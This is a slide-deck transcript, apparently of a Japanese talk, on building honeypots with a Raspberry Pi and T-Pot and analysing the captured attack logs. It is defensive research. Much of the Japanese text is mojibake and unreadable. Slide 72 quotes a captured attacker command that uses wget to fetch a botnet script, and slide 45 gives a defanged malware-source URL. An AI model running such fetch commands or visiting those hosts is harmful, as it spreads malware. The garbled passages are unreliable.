honey-pot with respberry-pi and T-Pot

Transcript

1. ROAD TO HONEY-POTTER ϋχʔϙολʔ΁ͷಓ 1

2. HONEY POTTER ໨࣍ ▸ ϋχʔϙοτͱ͸ ▸ honeeepi ▸ t-pot ▸

   Summary 2

3. HONEY POTTER ໨ඪ GOAL ▸ ݟश͍ϋχʔϙολʔʹͳΔ (Become a beginner honey

   potter) ▸ ߈ܸ͞ΕͯΔ͜ͱΛ஌Δ (Know that we are attacked) ▸ ϋχʔϙοτͷߏஙͱղੳํ๏Λ஌Δ (How to construct and analyze) 3

4. HONEY POTTER ղੳʹ͍ͭͯ ▸ ϩάղੳ͸ܦݧ͕େࣄʢΒ͍͠ʣ(Experience is important for log analysis)

   ▸ ࣗ෼΋ݟश͍ͳͷͰશһ͕πʔϧΛ࢖ͬͯͰ͖Δͱ͜Ζ·Ͱ ΍ͬͯݟΔ (I analyze it by using tools) 4

5. THE HONEYNET PROJECT ▸ ࠃࡍతͳϓϩδΣΫτ( https://www.honeynet.org/ ) ▸ ϋχʔϙοτͷOSS։ൃ (Developer

   of OSS for honeypot) ▸ ߈ܸ৘ใɺϚϧ΢ΣΞͷڞ༗ͳͲ 5

6. ϋχʔϙοτͱ͸ ϋχʔϙοτͱ͸ ▸ ϋχʔϙοτ͸͓ͱΓͷͨΊʹઃஔ͢ΔͷͰਖ਼نͷ௨৴͕ൃ ੜ͠ͳ͍ͱ͍͏ಛ௃͕͋Δɻ͜Ε͸ɺه࿥ʹ࢒ΔΞΫηε͸ ͢΂ͯෆਖ਼ΞΫηεͱͳΔͷͰɺޡݕ஌ΛݮΒ͠ݕ஌ӮΕΛ ͳ͘͢͜ͱ͕Ͱ͖Δɻ ϋχʔϙοτͷ໨తͱͯ͠ɺ΢Πϧ ε΍ϫʔϜͷݕମͷೖखɺෆਖ਼ΞΫηεΛߦ͏ΫϥοΧʔΛ ͓ͼ͖دͤॏཁͳγεςϜ͔Β߈ܸΛͦΒͨ͠Γɺه࿥͞Ε

   ͨૢ࡞ϩάɾ௨৴ϩάͳͲ͔Βෆਖ਼ΞΫηεͷख๏ͱ܏޲ͷ ௐࠪΛߦ͏ͳͲڍ͛ΒΕΔɻ(WikipediaΑΓ) 6

7. ϋχʔϙοτͱ͸ ϋχʔϙοτͱ͸ ▸ Ϛϧ΢ΣΞݕମͷೖख (Get a malware) ▸ ϩάΛऩूɾղੳΛͯ͠߈ܸख๏ɾ܏޲ͷௐࠪ (Research

   attack technique and tendency) ߈ܸ ϩάղੳ 7

8. ϋχʔϙοτͱ͸ ϋχʔϙοτͱ͸ ▸ ߈ܸΛͦΒ͢ ߈ܸ 8

9. ϋχʔϙοτͱ͸ ϋχʔϙοτͷछྨ ▸ ߴର࿩ܕ (high-interaction) ▸ ੬ऑੑΛ࢒ͨ͠ຊ෺ͷOS, ΞϓϦέʔγϣϯ (All Real

   OS, Application) ▸ ௿ର࿩ܕ(low-interaction) ▸ ಛఆͷOS, ΞϓϦέʔγϣϯΛ໛฿ (Specific OS, Application) 9

10. ϋχʔϙοτͱ͸ ϋχʔϙοτͷछྨ ▸ Server ܕ ▸ ߈ܸΛ଴ͪड͚Δ ▸ Client ܕ

    ▸ ෆ৹ͳαʔό΁ΞΫηε͠ʹߦ͘ 10

11. ϋχʔϙοτͱ͸ ͋ΒΏΔαʔϏεΛ໛฿ ▸ Database type ▸ Mongo-DB HoneyProxy ▸ Web

    type ▸ Glastopf, Dionaea ▸ SSH type ▸ Kippo, Cowrie ▸ Malware Collector, etc… ▸ Ϧετ- https://github.com/paralax/awesome-honeypots 11

12. HONEY POT ӡ༻্ͷ஫ҙ ▸ honeypotࣗମ͕੬ऑͳ͜ͱ΋͋Δ ▸ ౿Έ୆ʹ͞ΕͨΓɺٯʹѱ༻͞ΕΔՄೳੑ͕͋Δ ▸ ద੾ͳઃఆ͕ඞཁɻhoneypot͔Β֎΁ͷ௨৴Λ੍ݶ͢Δͳ Ͳ

    12

13. RASPIͰ ϋχʔϙοτ! 13

14. RASPIͰ؆୯ϋχʔϙοτ! HONEEEPI ▸ wiki - https://redmine.honeynet.org/projects/honeeepi/ wiki ▸ raspbian Λϋχʔϙοτ༻ʹΧελϚΠζͨ͠OS

    ▸ Conpot, Dionaea, Glastopf, Kippo, Cowrie 14

15. HONEEEPI CONPOT ▸ http://conpot.org/ ▸ ICS/SCADA Honeypot ▸ ࢈ۀ੍ޚγεςϜ(γεςϜ؂ࢹɺϓϩηε੍ޚΛ͢Δ)Λ ໛฿

    15

16. HONEEEPI DIONAEA ▸ https://github.com/gento/dionaea ▸ ϋΤτϦάα - Dionaea muscipula ▸

    ෳ਺ͷWebΞϓϦέʔγϣϯΛӡ༻(multiple applications) ▸ FTP, TFTP, HTTP, HTTPS, MSB, SIP, MSSQL, MySQL 16

17. HONEEEPI GLASTOPF ▸ http://mushmush.org/ ▸ WebʹಛԽͨ͠ϋχʔϙοτ(specialization in web) ▸ WebΞϓϦέʔγϣϯαʔόͱͯ͠ಈ͖ɺ80൪ϙʔτͰ଴

    ͪड͚ͯͦ͜ʹର͢Δ߈ܸΛݟΔ 17

18. HONEEEPI KIPPO ▸ https://github.com/desaster/kippo ▸ SSH honeypot ▸ ͲΜͳํ๏Ͱ઀ଓͯ͘͠Δ͔ ▸

    ϩάΠϯ͞Εͨ͋ͱԿΛͯ͘͠Δ͔ ▸ ରࡦ͕͞Ε͖ͯͯΔ 18

19. HONEEEPI COWRIE ▸ https://github.com/micheloosterhof/cowrie ▸ SSH Honeypot ▸ Kippoͷվྑ൛ 19

20. HONEEEPI HONEEEPIͷߏங ▸ http://qiita.com/junk_coken/items/ 5ba04bf2381b3e51d621 ▸ https://redmine.honeynet.org/projects/honeeepi/wiki 20

21. ߏஙํ๏͸هࣄΛݟ Ε͹Θ͔ΔͷͰɺɺ 21

22. HONEEEPI ߏங࣌ؾΛ͚ͭΔ͜ͱ ▸ SSHઃఆ (Setting of ssh) ▸ ϩάग़ྗઃఆ (Setting

    of log output) ▸ ݕ஌ճආ(Dionaea) (Detective evasion) 22

23. HONEEEPI SSHઃఆ ▸ ϙʔτมߋ( 22 → ?????) (Change port number)

    ▸ RSAೝূ (RSA Authentication) ▸ ύεϫʔυೝূOFF 23

24. HONEEEPI ϩάग़ྗઃఆ ▸ શͯͷϩάΛه࿥͢Δͱଟ͗͢Δ ▸ ඞཁͳϩάͷΈग़ྗ͢ΔΑ͏ʹઃఆ(honeypot͝ͱʹઃఆํ ๏ҟͳΔ) (Output only important

    logs) 24

25. HONEEEPI ݕ஌ճආ(DIONAEA) ▸ nmap Ͱϋχʔϙοτ͕ݕ஌͞ΕΔ৔߹͕͋Δ ▸ ͜ͷ··ͩͱόϨͯ߈ܸ͞Εͳ͍ 25

26. HONEEEPI ݕ஌ճආ(DIONAEA) ▸ nmapͷγάωνϟΛݟΔͱͲ͜Ͱݕ஌ͯ͠Δ͔Θ͔Δ (https://svn.nmap.org/nmap/nmap-service-probes) 26

27. HONEEEPI ݕ஌ճආ(DIONAEA) ▸ FTP - ϨεϙϯεϝοηʔδͰ൑ఆ ▸ Welcome to the

    ftp service ͱൺֱ ▸ ϨεϙϯεϝοηʔδΛม͑Ε͹ྑ͍ 27

28. HONEEEPI ݕ஌ճආ(DIONAEA) ▸ HTTP - σϑΥϧτͷϨεϙϯεΛݕ஌ ▸ webrootʹԿ͔͠ΒϑΝΠϧΛஔ͚͹ྑ͍ ▸ /opt/dionaea/var/dionaea/wwwroot

    ʹindex.htmlΛ͓͘ 28

29. HONEEEPI ݕ஌ճආ(DIONAEA) ▸ MSSQL - pre-login TDS package (Tabular Data

    Streams)ͷ ৘ใΛνΣοΫ͍ͯ͠Δ ▸ tokenTypeΛॻ͖׵͑Δ ▸ /opt/dionaea/lib/dionaea/python/dionaea/mssql/mssql.py 29

30. ՄࢹԽ VISUALIZATION 30

31. HONEEEPI DIONAEAFR ▸ ϩάՄࢹԽπʔϧ ▸ Service, IP, Port, URL, Malware,

    Country 31

32. HONEEEPI ஫ҙ ▸ ϥζύΠʹDionaeaFRೖΕΔͷ͸εϖοΫతʹਏ͍ ▸ ผͷԾ૝ϚγϯͳͲʹϩάϑΝΠϧ͚ͩ౉ͯ͠ݟ·͠ΐ͏ 32

33. HONEEEPI SERVICE 33

34. HONEEEPI MALWARE ▸ ઃஔ͞ΕͨόΠφϦϋογϡ஋ΛVirusTotalͰݕࡧͨ͠਺ ▸ VirusTotalͱͷ࿈ܞ͕ඞཁ 34

35. HONEEEPI COUNTRY ▸ ൒෼Ҏ্தࠃ (China more than half) 35

36. HONEEEPI IP 36

37. HONEEEPI IP 37

38. HONEEEPI AUGSE Ͱௐ΂Δ ▸ https://www.aguse.jp/ ▸ ௐ͍ࠪͨ͠αΠτͷURL΍ड৴ͨ͠ϝʔϧͷϝʔϧϔομʔ Λೖྗ͢Δ͜ͱʹΑΓɺؔ࿈͢Δ৘ใΛදࣔ͢ΔαʔϏε (ެ͔ࣜΒҾ༻) ▸

    ҆શʹո͍͠αΠτɺϝʔϧΛௐ΂ΒΕΔ (Research unreliable site or mail) 38

39. 39

40. 40

41. HONEEEPI BARRACUDA CENTRALͷ৘ใΛݟʹߦ͘ ▸ ϒϥοΫϦετೖΓͯ͠Δཧ༝͕هࡌ͞Ε͍ͯΔ ▸ poor - ৄ͍͠ཧ༝͸ແ͘ɺෆྑΒ͍͠ 41

42. HONEEEPI 123.207.23.254 ▸ ҟৗʹΞΫηε਺͕ଟ͍ (a lot of access) ▸ ͜Ε͔Βಈ͖͕͋Δ͔΋

    ▸ ࠓޙผͷϒϥοΫϦετʹೖΔՄೳੑ΋͋ΔͷͰɺఆظతʹ νΣοΫ͢Δ (It may go in blacklist in the future) 42

43. HONEEEPI ଞͷIP΋ௐ΂ͯݟΔ(ANOTHER IP) ▸ 167.160.182.27 - ϑϩϦμ, ϒϥοΫϦετͳ͠ ▸ 115.182.95.66

    - தࠃ, ϒϥοΫϦετͳ͠ ▸ 36.111.34.139 - தࠃ, ϒϥοΫϦετͳ͠ ▸ 123.57.255.171 - தࠃ, ϒϥοΫϦετͳ͠ ▸ 211.149.200.156 -115.182.95.66 - தࠃ, ϒϥοΫϦετͳ͠ ▸ 220.174.150.90 - தࠃ, ϒϥοΫϦετͳ͠ ▸ 61.133.116.18 - தࠃ(Shandong Liaocheng), ϒϥοΫϦετ3Օॴ 43

44. HONEEEPI 61.133.116.18 ▸ barracuda central, ▸ the spamhaus project ▸

    CBL ▸ ͷ̏ͭͷϒϥοΫϦετೖΓ 44

45. 61.133.116.18 CBLͷ৘ใΛݟͯΈͨ ▸ http://www.abuseat.org/lookup.cgi ▸ ͔͜͜ΒτϩΠͷ໦അɺϥϯαϜ΢ΣΞɺϘοτωοτͱͳ Δ΢Πϧε͕ײછΛड͚͍ͯͨ (Trojan horse, Ransomware,

    Botnet) ▸ h ttp ://n. hm ibl go j a.ru/ ͕ײછݯͷՄೳੑ͕͋Δ(઀ଓ͠ ͳ͍Ͱ͍ͩ͘͞) ▸ virustotal Ͱௐ΂ͯ΋Ϛϧ΢ΣΞ͕ݕग़͞Εͨ 45

46. T-POT 46

47. T-POT T-POT ▸ http://dtag-dev-sec.github.io/mediator/feature/2016/03/11/t- pot-16.03.html ▸ ϋχʔϙοτͷηοτΞοϓɺϩά؅ཧɺՄࢹԽπʔϧͷηο τΞοϓ·ͰࣗಈͰ΍ͬͯ͘ΕΔϓϥοτϑΥʔϜ ▸ Conpot,

    Cowrie, Dionaea, Elasticpot, eMobility, Glastopf, Honeytrap ▸ suricata, ELK Stack ▸ ࠷௿Ͱ΋ɺϝϞϦ4GB, 64GBσΟεΫ༰ྔ͸ඞཁ 47

48. T-POT ARCHITECTURE 48

49. T-POT PORT ߏ੒ 49

50. T-POT INSTALLATION ▸ iso image࡞Δ ▸ ىಈ͢Δ͚ͩͰ͋ͱͷηοτΞοϓ͸ࣗಈͰͯ͘͠ΕΔ (auto setup) 50

51. T-POT CONPOT ▸ http://conpot.org/ ▸ ICS/SCADA Honeypot ▸ ࢈ۀ੍ޚγεςϜ(γεςϜ؂ࢹɺϓϩηε੍ޚΛ͢Δ)ͷ ໛฿

    51

52. T-POT DIONAEA ▸ https://github.com/gento/dionaea ▸ ϋΤτϦάα - Dionaea muscipula ▸

    ෳ਺ͷWebΞϓϦέʔγϣϯΛӡ༻ ▸ FTP, TFTP, HTTP, HTTPS, MSB, SIP, MSSQL, MySQL 52

53. T-POT COWRIE ▸ https://github.com/micheloosterhof/cowrie ▸ SSH Honeypot ▸ Kippoͷվྑ൛ 53

54. T-POT GLASTOPF ▸ http://mushmush.org/ ▸ WebʹಛԽͨ͠ϋχʔϙοτ ▸ WebΞϓϦέʔγϣϯαʔόͱͯ͠ಈ͖ɺ80൪ϙʔτͰ ଴ͪड͚ͯͦ͜ʹର͢Δ߈ܸΛݟΔ 54

55. T-POT ELASTICPOT ▸ https://hub.docker.com/r/honeynet/elasticpot/ ▸ elastic search Λ໛ͨ͠ϋχʔϙοτ 55

56. T-POT EMOBILITY ▸ https://github.com/dtag-dev-sec/emobility ▸ Πϯϑϥʹର͢Δ߈ܸσʔλΛऩू? (Attack for infrastructure ?)

    56

57. T-POT HONEYTRAP ▸ ωοτϫʔΫαʔϏε΁ͷ߈ܸΛ؍ଌ (Attack for network services) ▸ ෳ਺ͷωοτϫʔΫαʔϏεͷΤϛϡϨʔγϣϯ

    ▸ ॳظ߈ܸΛݕ஌ 57

58. T-POT SURICATE ▸ http://suricata-ids.org/features/ ▸ ΦʔϓϯιʔεͷIDS/IPS (৵ೖݕ஌γεςϜ) 58

59. T-POT ELK-STACK ▸ Elasticksearch ▸ Logstash ▸ Kibana Ͱ͍͍ײ͡ʹϩάΛՄࢹԽͯ͘͠ΕΔ (Visualization)

    59

60. T-POT ACCESS COUNT 60

61. T-POT OS, SERVICE, COUNTRIES, USERNAME, PASSWORD, HISTOGRAM 61

62. T-POT COUNTRIES 62

63. T-POT IP, ASN, SURICATA ALERT 63

64. T-POT DOCKER 64

65. T-POT SYSTEM 65

66. T-POT LOG 66

67. T-POT LOG (HONEY TRAP) 67

68. T-POT LOG (HONEY TRAP) 68

69. 69

70. T-POT ةݥͰ͸ͳ͍Β͍͠ ▸ Windows͔ΒͷΞΫηε࣌ʹൃੜ͢Δʁ ▸ ૹΒΕ͖ͯͨσʔλͷαΠζɺϋογϡ஋౳Λग़ͯ͘͠ΕΔ ͷͰ͙͢VirusTotalͳͲͰௐ΂ΒΕΔ 70

71. T-POT LOG 71

72. T-POT LOG ▸ wget http:// 185.73.147. 5/ bins.sh ▸ bins.sh

    ΛDL͠Α͏ͱͯ͠Δ ▸ IP෦෼͕ҧ͏ύλʔϯ΋ଟ͘ݟ͚ͭΒΕͨ 72

73. ϋογϡ஋Λ ௐ΂Δͱɻɻɻ 73

74. T-POT VIRUSTOTAL 74

75. T-POT BINS.SH ▸ τϩΠͷ໦അ ▸ ଟ਺ͷIP͔ΒDL͠Α͏ͱͯ͠ΔͷͰɺେ͖ͳϘοτωοτ ͕͢Ͱʹܗ੒͞ΕͯΔ ▸ μ΢ϯϩʔυ͞ΕͨϑΝΠϧ͸ /data/cowrie/downloads/

    ʹอଘ͞Εɺ߈ܸऀ͸ΞΫηεͰ͖ͳ͍ 75

76. T-POT BINS.SH ▸ ֎෦͔Βૢ࡞Ͱ͖ΔΑ͏ʹඞཁͳίϚϯυͷΠϯεʔϧ ▸ ࣮ߦ → ࡟আ ▸ ͜ΕΛ܁Γฦͯ͠ײછΛ޿͛ͯΔ

    76

77. 185.73.147.5 ΛAGUSE Ͱௐ΂Δͱɻɻɻ 77

78. 78

79. T-POT SPAMHAUS ▸ https://www.spamhaus.org/ 79

80. IoT 80

81. T-POT T-POT ▸ isoΠϝʔδ̍ͭͰ؆୯ʹηοτΞοϓͯ͘͠ΕΔ ▸ ELKͰ௚ײతʹ͍ͭͲ͔͜ΒͲΜͳΞΫηε͕དྷͯΔ͔Θ͔ Δ 81

82. SUMMARY 82

83. HONEY POT 1ϲ݄؍࡯ͯ͠ݟͯ ▸ ৗʹ߈ܸ͞ΕͯΔ ▸ αʔϏεΛ༷ʑͳ(੬ऑͳ)όʔδϣϯʹม͑ͯ߈ܸͯ͘͠Δ ▸ Cowrieʹରͯ͠όοΫυΞΛ࢓ֻ͚ΔΑ͏ͳ߈ܸ͕ଟ͔ͬ ͨ

    (Attack for set a back door) ▸ bins.shͷDL 83

84. HONEY POT SUMMARY ▸ ϋχʔϙοτ͸؆୯ʹߏஙͰ͖Δ (Creating honeypot is easy) ▸

    ຖ೔ຖඵ߈ܸΛड͚ͯΔʂ(We are attacked everyday) ▸ ՄࢹԽͱπʔϧͷ͓͔͛ͰͳΜͱແ͘ղੳͬΆ͍͜ͱ͕Ͱ͖ ͨ 84

85. HONEY POT ࢀߟɾҾ༻ ▸ http://www.morihi-soc.net/ ▸ http://qiita.com/junk_coken/items/ 5ba04bf2381b3e51d621 ▸ http://blog.takanabe.tokyo/2015/04/24/293/

    ▸ https://www.securityartwork.es/2014/06/05/avoiding- dionaea-service-identification/ 85

86. THANK YOU FOR LISTENING 86